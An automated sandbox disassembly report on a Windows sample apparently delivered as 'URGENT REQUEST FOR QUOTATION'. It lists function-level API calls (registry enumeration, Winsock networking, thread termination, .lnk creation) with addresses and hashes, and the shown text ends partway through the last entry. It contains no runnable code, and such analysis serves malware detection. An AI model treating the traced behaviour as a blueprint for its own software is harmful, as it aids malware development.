                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                      • Opcode ID: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                                                                                                      • Instruction ID: b8d2df8cf751f8701105f5fa7ec7718fed04db13dc119f690d02fc3686e6a65b
                                                                                                                      • Opcode Fuzzy Hash: cfc93ad96c4c04c67fc34fc56405f467f45045a1c810108701c467921fdd5dbf
                                                                                                                      • Instruction Fuzzy Hash: 360162F25002087FFB10ABA4DD89EEB336CE708301F440496F74AE2041EA789E845F75
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(018ADEF0,018ADEF0), ref: 000A097B
                                                                                                                      • EnterCriticalSection.KERNEL32(018ADED0,00000000), ref: 000A098D
                                                                                                                      • TerminateThread.KERNEL32(018AAAD0,000001F6), ref: 000A099B
                                                                                                                      • WaitForSingleObject.KERNEL32(018AAAD0,000003E8), ref: 000A09A9
                                                                                                                      • CloseHandle.KERNEL32(018AAAD0), ref: 000A09B8
                                                                                                                      • InterlockedExchange.KERNEL32(018ADEF0,000001F6), ref: 000A09C8
                                                                                                                      • LeaveCriticalSection.KERNEL32(018ADED0), ref: 000A09CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                                                                                                      • Instruction ID: f727891f7544705724359d98f1d3c60d17aba02aa6ef717d822668f806153663
                                                                                                                      • Opcode Fuzzy Hash: 8e9f767eadc0529b8b221b366c14b672ae731f4c9862dde186ec3482a5aa255b
                                                                                                                      • Instruction Fuzzy Hash: 72F0EC32442A12BBF7515FA4EE8DFD6BB79FF06702F442025F206908A1C7799565CF90
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00035D30
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00035D71
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00035D99
                                                                                                                      • GetClientRect.USER32(?,?), ref: 00035ED7
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00035EF8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1296646539-0
                                                                                                                      • Opcode ID: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                                                                                                      • Instruction ID: a2683ce77ea0532d100ed37fc500bb3238098f41cc69d07f8700c9d991b65f86
                                                                                                                      • Opcode Fuzzy Hash: 0698ec5e8c03b4ed0f633db73fcf6e80661079cb98a41d1c379efd742fb21d23
                                                                                                                      • Instruction Fuzzy Hash: EDB18B35A0074ADBDB64CFA8C8807EEB7F5FF48311F14841AE8A9D7260DB34AA51DB54
                                                                                                                      APIs
                                                                                                                      • __allrem.LIBCMT ref: 000600BA
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000600D6
                                                                                                                      • __allrem.LIBCMT ref: 000600ED
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006010B
                                                                                                                      • __allrem.LIBCMT ref: 00060122
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00060140
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1992179935-0
                                                                                                                      • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                      • Instruction ID: 4d77bd61b663accc678d9751e3a0c2552aca8d2d12cd9714b42d5fc2f3f33ec9
                                                                                                                      • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                                      • Instruction Fuzzy Hash: 83811872A40706ABE7209F78CC41BAB73EAAF41324F24453EF955DB6C2E774D9448790
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000B3149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,000B101C,00000000,?,?,00000000), ref: 000B3195
                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 000B1DC0
                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 000B1DE1
                                                                                                                      • WSAGetLastError.WSOCK32 ref: 000B1DF2
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 000B1E8C
                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 000B1EDB
                                                                                                                      • _strlen.LIBCMT ref: 000B1F35
                                                                                                                        • Part of subcall function 000939E8: _strlen.LIBCMT ref: 000939F2
                                                                                                                        • Part of subcall function 00036D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0004CF58,?,?,?), ref: 00036DBA
                                                                                                                        • Part of subcall function 00036D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0004CF58,?,?,?), ref: 00036DED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1923757996-0
                                                                                                                      • Opcode ID: 5ea6eb770f30ff0d57553aa0bc6f0e0cd602551b15e697edfbf41e078777d292
                                                                                                                      • Instruction ID: e3508d6c2cf6cdb5668565e1b9f69be481b0e27b91685841af9498dc9896c2ef
                                                                                                                      • Opcode Fuzzy Hash: 5ea6eb770f30ff0d57553aa0bc6f0e0cd602551b15e697edfbf41e078777d292
                                                                                                                      • Instruction Fuzzy Hash: 6EA1CE70204301AFD324DB24C895FAA7BE9AF84318F94895CF55A5B2A3CB71ED46CB91
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000582D9,000582D9,?,?,?,0006644F,00000001,00000001,8BE85006), ref: 00066258
                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006644F,00000001,00000001,8BE85006,?,?,?), ref: 000662DE
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000663D8
                                                                                                                      • __freea.LIBCMT ref: 000663E5
                                                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                                                      • __freea.LIBCMT ref: 000663EE
                                                                                                                      • __freea.LIBCMT ref: 00066413
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1414292761-0
                                                                                                                      • Opcode ID: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                                                                                                      • Instruction ID: cbd1560ff7d8335ab52a44faf572cce14d657d990a7c445426dcce90d317b4bf
                                                                                                                      • Opcode Fuzzy Hash: 8ce244acdae8ed960616c08ff98aff6047be5804d1efdbec35df3e6c98a7257d
                                                                                                                      • Instruction Fuzzy Hash: E551D372A00226ABEB258F64CC81EBF77ABEF45750F154629FD05D7241EB36DE40C6A0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BBDF3
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BBDFF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1120388591-0
                                                                                                                      • Opcode ID: 8f417d1a7bf10327ba7385af693b366afbeb2d8dbeaa2fadb391acd26cbebb1c
                                                                                                                      • Instruction ID: 099fe6a70b12a000cc99c8976a5b00bd5e6bc0e47a73931a6dab04a9ab4f19fd
                                                                                                                      • Opcode Fuzzy Hash: 8f417d1a7bf10327ba7385af693b366afbeb2d8dbeaa2fadb391acd26cbebb1c
                                                                                                                      • Instruction Fuzzy Hash: DA81D270208241EFD715DF24C885EAABBE9FF84308F54895CF4994B2A2DB71ED45CB92
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 0008F7B9
                                                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 0008F860
                                                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F889
                                                                                                                      • VariantClear.OLEAUT32(0008FA64), ref: 0008F8AD
                                                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F8B1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0008F8BB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859894641-0
                                                                                                                      • Opcode ID: 311b66a3147e2588892b091dfafa406631ecda136271ffa06cb45d3b940614fa
                                                                                                                      • Instruction ID: 0051a7dd34c2c9868658e2387f5309169dac5853808b4ca6d963b30d50a391cc
                                                                                                                      • Opcode Fuzzy Hash: 311b66a3147e2588892b091dfafa406631ecda136271ffa06cb45d3b940614fa
                                                                                                                      • Instruction Fuzzy Hash: E351D131600312BADF24BB75D895B7DB3A9FF45310F208466E986DF292DB708C40CBA6
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 000A94E5
                                                                                                                      • _wcslen.LIBCMT ref: 000A9506
                                                                                                                      • _wcslen.LIBCMT ref: 000A952D
                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 000A9585
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 83654149-3081909835
                                                                                                                      • Opcode ID: dd88c0f56c254962f49bb89e5827c66fd9d1d15bdd9dd34c0ff3ec5e71542245
                                                                                                                      • Instruction ID: ed5105caf5386126a1abee5de1267f72daf6515aec977b47cfae8dc4ee114f6c
                                                                                                                      • Opcode Fuzzy Hash: dd88c0f56c254962f49bb89e5827c66fd9d1d15bdd9dd34c0ff3ec5e71542245
                                                                                                                      • Instruction Fuzzy Hash: 39E1A271A083019FD725DF64C881BAEB7E4BF85314F14896DF8899B2A2DB31DD05CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      • BeginPaint.USER32(?,?,?), ref: 00049241
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000492A5
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000492C2
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000492D3
                                                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00049321
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000871EA
                                                                                                                        • Part of subcall function 00049339: BeginPath.GDI32(00000000), ref: 00049357
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3050599898-0
                                                                                                                      • Opcode ID: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                                                                                                      • Instruction ID: 084ac152a72a7c5693e5d0b2cfd33a2f6bc65c65f329fd1059e8369fb663974f
                                                                                                                      • Opcode Fuzzy Hash: 77dd61041869993c5964b6a6384827e8594cc69771c22a3ee08f7fabbb63dd20
                                                                                                                      • Instruction Fuzzy Hash: B8419F70104200AFE721DF24CC88FAB7BE8FB4A325F140679F998876A2C7759985DB61
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 000A080C
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000A0847
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 000A0863
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 000A08DC
                                                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000A08F3
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 000A0921
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3368777196-0
                                                                                                                      • Opcode ID: 9025b1e0fe164dc468249c9c26ed30af6dbfd732edbec760fc15ef28fc75a5a7
                                                                                                                      • Instruction ID: 71259f09b0bc7c67c83d5b6d8c6510bc64e90561b43ce635db7e6e8edfdcf5cc
                                                                                                                      • Opcode Fuzzy Hash: 9025b1e0fe164dc468249c9c26ed30af6dbfd732edbec760fc15ef28fc75a5a7
                                                                                                                      • Instruction Fuzzy Hash: EF417C71900209EFEF149F94DC85AAAB7B8FF05310F1440B9ED049A297DB34DE65DBA4
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0008F3AB,00000000,?,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 000C824C
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 000C8272
                                                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 000C82D1
                                                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 000C82E5
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 000C830B
                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000C832F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                                                      • Instruction ID: 292b9e8cba85fcf0a3719ba5a9afad8327ee1bdf5bc1f4c06edccaf60a8da7d2
                                                                                                                      • Opcode Fuzzy Hash: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                                                                                                      • Instruction Fuzzy Hash: D841A234601644EFEB61CF15C89DFEC7BE0FB0A714F1892ADE5484B2A2CB75A881CB54
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00094C95
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00094CB2
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00094CEA
                                                                                                                      • _wcslen.LIBCMT ref: 00094D08
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00094D10
                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094D1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 72514467-0
                                                                                                                      • Opcode ID: 4da2fe354652d88e77375c1b4a13b086a9e8f749fdb24d8e84bcdd2b8f6287d1
                                                                                                                      • Instruction ID: e5fb9e37c81d5dd5043aaecb2a0de297d0f4b1db03d7578f3acb23c3500075d8
                                                                                                                      • Opcode Fuzzy Hash: 4da2fe354652d88e77375c1b4a13b086a9e8f749fdb24d8e84bcdd2b8f6287d1
                                                                                                                      • Instruction Fuzzy Hash: E3210476205200BBFF655B29ED49E7F7BD8DF45750F108039F809CA192EA75CC42A6A0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                                                      • _wcslen.LIBCMT ref: 000A587B
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 000A5995
                                                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
                                                                                                                      • CoUninitialize.OLE32 ref: 000A59CC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                      • Opcode ID: 11d8a5310a7f05e56625cc3c43a21c314ea10876a7d794dc0087e6a222b57207
